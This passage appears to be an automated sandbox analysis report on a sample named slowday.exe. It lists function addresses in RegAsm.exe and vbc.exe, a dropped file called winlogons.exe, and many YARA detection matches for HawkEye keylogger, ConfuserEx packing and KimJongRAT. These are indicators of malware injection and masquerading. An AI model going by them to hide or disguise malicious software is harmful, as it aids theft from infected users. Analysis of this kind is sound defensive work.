            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeCode function: 1_2_00FA8B90
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeCode function: 1_2_00FA7F10
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeCode function: 1_2_00FADCD8
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeCode function: 1_2_00FA08B0
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeCode function: 1_2_00FA38B7
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeCode function: 1_2_00FA5890
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeCode function: 1_2_00FA388B
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeCode function: 1_2_00FA5880
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeCode function: 1_2_00FA3868
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeCode function: 1_2_00FA8445
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeCode function: 1_2_00FA8024
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeCode function: 1_2_00FA3C00
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeCode function: 1_2_00FA3DF9
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeCode function: 1_2_00FA39DA
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeCode function: 1_2_00FA41D8
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeCode function: 1_2_00FA45C0
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeCode function: 1_2_00FA4DB0
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeCode function: 1_2_00FA3580
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeCode function: 1_2_00FAD944
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeCode function: 1_2_00FA6D30
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeCode function: 1_2_00FA390D
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeCode function: 1_2_00FACACD
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeCode function: 1_2_00FA7EC1
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeCode function: 1_2_00FA3AB4
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeCode function: 1_2_00FAD6AC
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeCode function: 1_2_00FA369C
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeCode function: 1_2_00FACA89
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeCode function: 1_2_00FA3671
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeCode function: 1_2_00FA3A77
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeCode function: 1_2_00FACA46
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeCode function: 1_2_00FA3A3A
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeCode function: 1_2_00FADE37
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeCode function: 1_2_00FA6A29
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeCode function: 1_2_00FA7A20
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeCode function: 1_2_00FA361B
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeCode function: 1_2_00FA3218
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeCode function: 1_2_00FA3E00
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeCode function: 1_2_00FA37FA
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeCode function: 1_2_00FAD3F8
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeCode function: 1_2_00FA3BF0
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeCode function: 1_2_00FA37B8
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeCode function: 1_2_00FA3777
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeCode function: 1_2_00FA5768
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeCode function: 1_2_00FA3744
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeCode function: 1_2_00FA2730
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeCode function: 1_2_00FA3711
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeCode function: 1_2_00FA7F09
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeCode function: 1_2_00FA3B0F
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeCode function: 1_2_00FADF0C
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 2_2_0044900F
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 2_2_004042EB
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 2_2_00414281
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 2_2_00410291
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 2_2_004063BB
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 2_2_00415624
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 2_2_0041668D
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 2_2_0040477F
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 2_2_0040487C
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 2_2_0043589B
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 2_2_0043BA9D
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 2_2_0043FBD3
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 6_2_0044900F
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 6_2_004042EB
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 6_2_00414281
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 6_2_00410291
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 6_2_004063BB
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 6_2_00415624
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 6_2_0041668D
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 6_2_0040477F
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 6_2_0040487C
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 6_2_0043589B
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 6_2_0043BA9D
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 6_2_0043FBD3
            Source: slowday.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
            Source: slowday.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
            Source: slowday.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
            Source: slowday.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
            Source: slowday.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
            Source: slowday.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
            Source: winlogons.exe.0.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
            Source: winlogons.exe.0.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
            Source: winlogons.exe.0.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
            Source: winlogons.exe.0.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
            Source: winlogons.exe.0.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
            Source: winlogons.exe.0.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeSection loaded: sfc.dll
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeSection loaded: sfc.dll
            Source: slowday.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
            Source: 35.0.vbc.exe.400000.4.raw.unpack, type: UNPACKEDPEMatched rule: APT_NK_BabyShark_KimJoingRAT_Apr19_1 date = 2019-04-27, hash1 = d50a0980da6297b8e4cec5db0a8773635cee74ac6f5c1ff18197dfba549f6712, author = Florian Roth, description = Detects BabyShark KimJongRAT, reference = https://unit42.paloaltonetworks.com/babyshark-malware-part-two-attacks-continue-using-kimjongrat-and-pcrat/
            Source: 35.0.vbc.exe.400000.2.unpack, type: UNPACKEDPEMatched rule: APT_NK_BabyShark_KimJoingRAT_Apr19_1 date = 2019-04-27, hash1 = d50a0980da6297b8e4cec5db0a8773635cee74ac6f5c1ff18197dfba549f6712, author = Florian Roth, description = Detects BabyShark KimJongRAT, reference = https://unit42.paloaltonetworks.com/babyshark-malware-part-two-attacks-continue-using-kimjongrat-and-pcrat/
            Source: 35.0.vbc.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: APT_NK_BabyShark_KimJoingRAT_Apr19_1 date = 2019-04-27, hash1 = d50a0980da6297b8e4cec5db0a8773635cee74ac6f5c1ff18197dfba549f6712, author = Florian Roth, description = Detects BabyShark KimJongRAT, reference = https://unit42.paloaltonetworks.com/babyshark-malware-part-two-attacks-continue-using-kimjongrat-and-pcrat/
            Source: 30.0.vbc.exe.400000.5.raw.unpack, type: UNPACKEDPEMatched rule: APT_NK_BabyShark_KimJoingRAT_Apr19_1 date = 2019-04-27, hash1 = d50a0980da6297b8e4cec5db0a8773635cee74ac6f5c1ff18197dfba549f6712, author = Florian Roth, description = Detects BabyShark KimJongRAT, reference = https://unit42.paloaltonetworks.com/babyshark-malware-part-two-attacks-continue-using-kimjongrat-and-pcrat/
            Source: 30.0.vbc.exe.400000.2.raw.unpack, type: UNPACKEDPEMatched rule: APT_NK_BabyShark_KimJoingRAT_Apr19_1 date = 2019-04-27, hash1 = d50a0980da6297b8e4cec5db0a8773635cee74ac6f5c1ff18197dfba549f6712, author = Florian Roth, description = Detects BabyShark KimJongRAT, reference = https://unit42.paloaltonetworks.com/babyshark-malware-part-two-attacks-continue-using-kimjongrat-and-pcrat/
            Source: 8.2.RegAsm.exe.4b4834a.3.unpack, type: UNPACKEDPEMatched rule: APT_NK_BabyShark_KimJoingRAT_Apr19_1 date = 2019-04-27, hash1 = d50a0980da6297b8e4cec5db0a8773635cee74ac6f5c1ff18197dfba549f6712, author = Florian Roth, description = Detects BabyShark KimJongRAT, reference = https://unit42.paloaltonetworks.com/babyshark-malware-part-two-attacks-continue-using-kimjongrat-and-pcrat/
            Source: 35.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: APT_NK_BabyShark_KimJoingRAT_Apr19_1 date = 2019-04-27, hash1 = d50a0980da6297b8e4cec5db0a8773635cee74ac6f5c1ff18197dfba549f6712, author = Florian Roth, description = Detects BabyShark KimJongRAT, reference = https://unit42.paloaltonetworks.com/babyshark-malware-part-two-attacks-continue-using-kimjongrat-and-pcrat/
            Source: 30.2.vbc.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: APT_NK_BabyShark_KimJoingRAT_Apr19_1 date = 2019-04-27, hash1 = d50a0980da6297b8e4cec5db0a8773635cee74ac6f5c1ff18197dfba549f6712, author = Florian Roth, description = Detects BabyShark KimJongRAT, reference = https://unit42.paloaltonetworks.com/babyshark-malware-part-two-attacks-continue-using-kimjongrat-and-pcrat/
            Source: 30.0.vbc.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: APT_NK_BabyShark_KimJoingRAT_Apr19_1 date = 2019-04-27, hash1 = d50a0980da6297b8e4cec5db0a8773635cee74ac6f5c1ff18197dfba549f6712, author = Florian Roth, description = Detects BabyShark KimJongRAT, reference = https://unit42.paloaltonetworks.com/babyshark-malware-part-two-attacks-continue-using-kimjongrat-and-pcrat/
            Source: 30.0.vbc.exe.400000.2.unpack, type: UNPACKEDPEMatched rule: APT_NK_BabyShark_KimJoingRAT_Apr19_1 date = 2019-04-27, hash1 = d50a0980da6297b8e4cec5db0a8773635cee74ac6f5c1ff18197dfba549f6712, author = Florian Roth, description = Detects BabyShark KimJongRAT, reference = https://unit42.paloaltonetworks.com/babyshark-malware-part-two-attacks-continue-using-kimjongrat-and-pcrat/
            Source: 1.2.RegAsm.exe.f1834a.2.unpack, type: UNPACKEDPEMatched rule: APT_NK_BabyShark_KimJoingRAT_Apr19_1 date = 2019-04-27, hash1 = d50a0980da6297b8e4cec5db0a8773635cee74ac6f5c1ff18197dfba549f6712, author = Florian Roth, description = Detects BabyShark KimJongRAT, reference = https://unit42.paloaltonetworks.com/babyshark-malware-part-two-attacks-continue-using-kimjongrat-and-pcrat/
            Source: 8.3.RegAsm.exe.43bb8f2.0.raw.unpack, type: UNPACKEDPEMatched rule: APT_NK_BabyShark_KimJoingRAT_Apr19_1 date = 2019-04-27, hash1 = d50a0980da6297b8e4cec5db0a8773635cee74ac6f5c1ff18197dfba549f6712, author = Florian Roth, description = Detects BabyShark KimJongRAT, reference = https://unit42.paloaltonetworks.com/babyshark-malware-part-two-attacks-continue-using-kimjongrat-and-pcrat/
            Source: 1.3.RegAsm.exe.47c35a8.2.raw.unpack, type: UNPACKEDPEMatched rule: APT_NK_BabyShark_KimJoingRAT_Apr19_1 date = 2019-04-27, hash1 = d50a0980da6297b8e4cec5db0a8773635cee74ac6f5c1ff18197dfba549f6712, author = Florian Roth, description = Detects BabyShark KimJongRAT, reference = https://unit42.paloaltonetworks.com/babyshark-malware-part-two-attacks-continue-using-kimjongrat-and-pcrat/
            Source: 30.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: APT_NK_BabyShark_KimJoingRAT_Apr19_1 date = 2019-04-27, hash1 = d50a0980da6297b8e4cec5db0a8773635cee74ac6f5c1ff18197dfba549f6712, author = Florian Roth, description = Detects BabyShark KimJongRAT, reference = https://unit42.paloaltonetworks.com/babyshark-malware-part-two-attacks-continue-using-kimjongrat-and-pcrat/
            Source: 35.0.vbc.exe.400000.3.raw.unpack, type: UNPACKEDPEMatched rule: APT_NK_BabyShark_KimJoingRAT_Apr19_1 date = 2019-04-27, hash1 = d50a0980da6297b8e4cec5db0a8773635cee74ac6f5c1ff18197dfba549f6712, author = Florian Roth, description = Detects BabyShark KimJongRAT, reference = https://unit42.paloaltonetworks.com/babyshark-malware-part-two-attacks-continue-using-kimjongrat-and-pcrat/
            Source: 1.2.RegAsm.exe.ec0345.3.raw.unpack, type: UNPACKEDPEMatched rule: APT_NK_BabyShark_KimJoingRAT_Apr19_1 date = 2019-04-27, hash1 = d50a0980da6297b8e4cec5db0a8773635cee74ac6f5c1ff18197dfba549f6712, author = Florian Roth, description = Detects BabyShark KimJongRAT, reference = https://unit42.paloaltonetworks.com/babyshark-malware-part-two-attacks-continue-using-kimjongrat-and-pcrat/
            Source: 35.0.vbc.exe.400000.2.raw.unpack, type: UNPACKEDPEMatched rule: APT_NK_BabyShark_KimJoingRAT_Apr19_1 date = 2019-04-27, hash1 = d50a0980da6297b8e4cec5db0a8773635cee74ac6f5c1ff18197dfba549f6712, author = Florian Roth, description = Detects BabyShark KimJongRAT, reference = https://unit42.paloaltonetworks.com/babyshark-malware-part-two-attacks-continue-using-kimjongrat-and-pcrat/
            Source: 8.2.RegAsm.exe.4af0000.2.unpack, type: UNPACKEDPEMatched rule: APT_NK_BabyShark_KimJoingRAT_Apr19_1 date = 2019-04-27, hash1 = d50a0980da6297b8e4cec5db0a8773635cee74ac6f5c1ff18197dfba549f6712, author = Florian Roth, description = Detects BabyShark KimJongRAT, reference = https://unit42.paloaltonetworks.com/babyshark-malware-part-two-attacks-continue-using-kimjongrat-and-pcrat/
            Source: 1.2.RegAsm.exe.6abdc50.5.raw.unpack, type: UNPACKEDPEMatched rule: APT_NK_BabyShark_KimJoingRAT_Apr19_1 date = 2019-04-27, hash1 = d50a0980da6297b8e4cec5db0a8773635cee74ac6f5c1ff18197dfba549f6712, author = Florian Roth, description = Detects BabyShark KimJongRAT, reference = https://unit42.paloaltonetworks.com/babyshark-malware-part-two-attacks-continue-using-kimjongrat-and-pcrat/
            Source: 30.0.vbc.exe.400000.3.raw.unpack, type: UNPACKEDPEMatched rule: APT_NK_BabyShark_KimJoingRAT_Apr19_1 date = 2019-04-27, hash1 = d50a0980da6297b8e4cec5db0a8773635cee74ac6f5c1ff18197dfba549f6712, author = Florian Roth, description = Detects BabyShark KimJongRAT, reference = https://unit42.paloaltonetworks.com/babyshark-malware-part-two-attacks-continue-using-kimjongrat-and-pcrat/
            Source: 1.0.RegAsm.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MAL_HawkEye_Keylogger_Gen_Dec18 date = 2018-12-10, hash1 = b8693e015660d7bd791356b352789b43bf932793457d54beae351cf7a3de4dad, author = Florian Roth, description = Detects HawkEye Keylogger Reborn, reference = https://twitter.com/James_inthe_box/status/1072116224652324870
            Source: 1.0.RegAsm.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: SUSP_NET_NAME_ConfuserEx author = Arnim Rupp, description = Detects ConfuserEx packed file, reference = https://github.com/yck1509/ConfuserEx, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = 2021-01-22, modified = 2021-01-25
            Source: 1.0.RegAsm.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_HawkEyeV9 author = ditekshen, description = Detects HawkEyeV9 payload, clamav_sig = MALWARE.Win.Trojan.HawkEyeV9
            Source: 1.0.RegAsm.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: HawkEyev9 author = ditekshen, description = HawkEye v9 Payload, cape_type = HawkEyev9 Payload
            Source: 1.3.RegAsm.exe.481b8f2.0.raw.unpack, type: UNPACKEDPEMatched rule: APT_NK_BabyShark_KimJoingRAT_Apr19_1 date = 2019-04-27, hash1 = d50a0980da6297b8e4cec5db0a8773635cee74ac6f5c1ff18197dfba549f6712, author = Florian Roth, description = Detects BabyShark KimJongRAT, reference = https://unit42.paloaltonetworks.com/babyshark-malware-part-two-attacks-continue-using-kimjongrat-and-pcrat/
            Source: 1.3.RegAsm.exe.47c38ed.1.raw.unpack, type: UNPACKEDPEMatched rule: APT_NK_BabyShark_KimJoingRAT_Apr19_1 date = 2019-04-27, hash1 = d50a0980da6297b8e4cec5db0a8773635cee74ac6f5c1ff18197dfba549f6712, author = Florian Roth, description = Detects BabyShark KimJongRAT, reference = https://unit42.paloaltonetworks.com/babyshark-malware-part-two-attacks-continue-using-kimjongrat-and-pcrat/
            Source: 8.2.RegAsm.exe.4b4834a.3.raw.unpack, type: UNPACKEDPEMatched rule: APT_NK_BabyShark_KimJoingRAT_Apr19_1 date = 2019-04-27, hash1 = d50a0980da6297b8e4cec5db0a8773635cee74ac6f5c1ff18197dfba549f6712, author = Florian Roth, description = Detects BabyShark KimJongRAT, reference = https://unit42.paloaltonetworks.com/babyshark-malware-part-two-attacks-continue-using-kimjongrat-and-pcrat/
            Source: 30.0.vbc.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: APT_NK_BabyShark_KimJoingRAT_Apr19_1 date = 2019-04-27, hash1 = d50a0980da6297b8e4cec5db0a8773635cee74ac6f5c1ff18197dfba549f6712, author = Florian Roth, description = Detects BabyShark KimJongRAT, reference = https://unit42.paloaltonetworks.com/babyshark-malware-part-two-attacks-continue-using-kimjongrat-and-pcrat/
            Source: 1.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MAL_HawkEye_Keylogger_Gen_Dec18 date = 2018-12-10, hash1 = b8693e015660d7bd791356b352789b43bf932793457d54beae351cf7a3de4dad, author = Florian Roth, description = Detects HawkEye Keylogger Reborn, reference = https://twitter.com/James_inthe_box/status/1072116224652324870
            Source: 1.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: SUSP_NET_NAME_ConfuserEx author = Arnim Rupp, description = Detects ConfuserEx packed file, reference = https://github.com/yck1509/ConfuserEx, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = 2021-01-22, modified = 2021-01-25
            Source: 1.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_HawkEyeV9 author = ditekshen, description = Detects HawkEyeV9 payload, clamav_sig = MALWARE.Win.Trojan.HawkEyeV9
            Source: 1.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: HawkEyev9 author = ditekshen, description = HawkEye v9 Payload, cape_type = HawkEyev9 Payload
            Source: 30.0.vbc.exe.400000.3.unpack, type: UNPACKEDPEMatched rule: APT_NK_BabyShark_KimJoingRAT_Apr19_1 date = 2019-04-27, hash1 = d50a0980da6297b8e4cec5db0a8773635cee74ac6f5c1ff18197dfba549f6712, author = Florian Roth, description = Detects BabyShark KimJongRAT, reference = https://unit42.paloaltonetworks.com/babyshark-malware-part-two-attacks-continue-using-kimjongrat-and-pcrat/
            Source: 7.3.winlogons.exe.3790000.0.unpack, type: UNPACKEDPEMatched rule: MAL_HawkEye_Keylogger_Gen_Dec18 date = 2018-12-10, hash1 = b8693e015660d7bd791356b352789b43bf932793457d54beae351cf7a3de4dad, author = Florian Roth, description = Detects HawkEye Keylogger Reborn, reference = https://twitter.com/James_inthe_box/status/1072116224652324870
            Source: 7.3.winlogons.exe.3790000.0.unpack, type: UNPACKEDPEMatched rule: SUSP_NET_NAME_ConfuserEx author = Arnim Rupp, description = Detects ConfuserEx packed file, reference = https://github.com/yck1509/ConfuserEx, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = 2021-01-22, modified = 2021-01-25
            Source: 7.3.winlogons.exe.3790000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_HawkEyeV9 author = ditekshen, description = Detects HawkEyeV9 payload, clamav_sig = MALWARE.Win.Trojan.HawkEyeV9
            Source: 7.3.winlogons.exe.3790000.0.unpack, type: UNPACKEDPEMatched rule: HawkEyev9 author = ditekshen, description = HawkEye v9 Payload, cape_type = HawkEyev9 Payload
            Source: 8.3.RegAsm.exe.43bb8f2.0.unpack, type: UNPACKEDPEMatched rule: APT_NK_BabyShark_KimJoingRAT_Apr19_1 date = 2019-04-27, hash1 = d50a0980da6297b8e4cec5db0a8773635cee74ac6f5c1ff18197dfba549f6712, author = Florian Roth, description = Detects BabyShark KimJongRAT, reference = https://unit42.paloaltonetworks.com/babyshark-malware-part-two-attacks-continue-using-kimjongrat-and-pcrat/
            Source: 8.0.RegAsm.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MAL_HawkEye_Keylogger_Gen_Dec18 date = 2018-12-10, hash1 = b8693e015660d7bd791356b352789b43bf932793457d54beae351cf7a3de4dad, author = Florian Roth, description = Detects HawkEye Keylogger Reborn, reference = https://twitter.com/James_inthe_box/status/1072116224652324870
            Source: 8.0.RegAsm.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: SUSP_NET_NAME_ConfuserEx author = Arnim Rupp, description = Detects ConfuserEx packed file, reference = https://github.com/yck1509/ConfuserEx, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = 2021-01-22, modified = 2021-01-25
            Source: 8.0.RegAsm.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_HawkEyeV9 author = ditekshen, description = Detects HawkEyeV9 payload, clamav_sig = MALWARE.Win.Trojan.HawkEyeV9
            Source: 8.0.RegAsm.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: HawkEyev9 author = ditekshen, description = HawkEye v9 Payload, cape_type = HawkEyev9 Payload
            Source: 30.0.vbc.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: APT_NK_BabyShark_KimJoingRAT_Apr19_1 date = 2019-04-27, hash1 = d50a0980da6297b8e4cec5db0a8773635cee74ac6f5c1ff18197dfba549f6712, author = Florian Roth, description = Detects BabyShark KimJongRAT, reference = https://unit42.paloaltonetworks.com/babyshark-malware-part-two-attacks-continue-using-kimjongrat-and-pcrat/
            Source: 1.3.RegAsm.exe.481b8f2.0.unpack, type: UNPACKEDPEMatched rule: APT_NK_BabyShark_KimJoingRAT_Apr19_1 date = 2019-04-27, hash1 = d50a0980da6297b8e4cec5db0a8773635cee74ac6f5c1ff18197dfba549f6712, author = Florian Roth, description = Detects BabyShark KimJongRAT, reference = https://unit42.paloaltonetworks.com/babyshark-malware-part-two-attacks-continue-using-kimjongrat-and-pcrat/
            Source: 8.3.RegAsm.exe.43635a8.2.unpack, type: UNPACKEDPEMatched rule: APT_NK_BabyShark_KimJoingRAT_Apr19_1 date = 2019-04-27, hash1 = d50a0980da6297b8e4cec5db0a8773635cee74ac6f5c1ff18197dfba549f6712, author = Florian Roth, description = Detects BabyShark KimJongRAT, reference = https://unit42.paloaltonetworks.com/babyshark-malware-part-two-attacks-continue-using-kimjongrat-and-pcrat/
            Source: 1.2.RegAsm.exe.ec0000.1.raw.unpack, type: UNPACKEDPEMatched rule: APT_NK_BabyShark_KimJoingRAT_Apr19_1 date = 2019-04-27, hash1 = d50a0980da6297b8e4cec5db0a8773635cee74ac6f5c1ff18197dfba549f6712, author = Florian Roth, description = Detects BabyShark KimJongRAT, reference = https://unit42.paloaltonetworks.com/babyshark-malware-part-two-attacks-continue-using-kimjongrat-and-pcrat/
            Source: 8.3.RegAsm.exe.43635a8.2.raw.unpack, type: UNPACKEDPEMatched rule: APT_NK_BabyShark_KimJoingRAT_Apr19_1 date = 2019-04-27, hash1 = d50a0980da6297b8e4cec5db0a8773635cee74ac6f5c1ff18197dfba549f6712, author = Florian Roth, description = Detects BabyShark KimJongRAT, reference = https://unit42.paloaltonetworks.com/babyshark-malware-part-two-attacks-continue-using-kimjongrat-and-pcrat/
            Source: 8.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MAL_HawkEye_Keylogger_Gen_Dec18 date = 2018-12-10, hash1 = b8693e015660d7bd791356b352789b43bf932793457d54beae351cf7a3de4dad, author = Florian Roth, description = Detects HawkEye Keylogger Reborn, reference = https://twitter.com/James_inthe_box/status/1072116224652324870
            Source: 8.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: SUSP_NET_NAME_ConfuserEx author = Arnim Rupp, description = Detects ConfuserEx packed file, reference = https://github.com/yck1509/ConfuserEx, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = 2021-01-22, modified = 2021-01-25
            Source: 8.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_HawkEyeV9 author = ditekshen, description = Detects HawkEyeV9 payload, clamav_sig = MALWARE.Win.Trojan.HawkEyeV9
            Source: 8.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: HawkEyev9 author = ditekshen, description = HawkEye v9 Payload, cape_type = HawkEyev9 Payload
            Source: 0.3.slowday.exe.3b50000.0.unpack, type: UNPACKEDPEMatched rule: MAL_HawkEye_Keylogger_Gen_Dec18 date = 2018-12-10, hash1 = b8693e015660d7bd791356b352789b43bf932793457d54beae351cf7a3de4dad, author = Florian Roth, description = Detects HawkEye Keylogger Reborn, reference = https://twitter.com/James_inthe_box/status/1072116224652324870
            Source: 0.3.slowday.exe.3b50000.0.unpack, type: UNPACKEDPEMatched rule: SUSP_NET_NAME_ConfuserEx author = Arnim Rupp, description = Detects ConfuserEx packed file, reference = https://github.com/yck1509/ConfuserEx, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = 2021-01-22, modified = 2021-01-25
            Source: 0.3.slowday.exe.3b50000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_HawkEyeV9 author = ditekshen, description = Detects HawkEyeV9 payload, clamav_sig = MALWARE.Win.Trojan.HawkEyeV9
            Source: 0.3.slowday.exe.3b50000.0.unpack, type: UNPACKEDPEMatched rule: HawkEyev9 author = ditekshen, description = HawkEye v9 Payload, cape_type = HawkEyev9 Payload
            Source: 8.0.RegAsm.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: MAL_HawkEye_Keylogger_Gen_Dec18 date = 2018-12-10, hash1 = b8693e015660d7bd791356b352789b43bf932793457d54beae351cf7a3de4dad, author = Florian Roth, description = Detects HawkEye Keylogger Reborn, reference = https://twitter.com/James_inthe_box/status/1072116224652324870
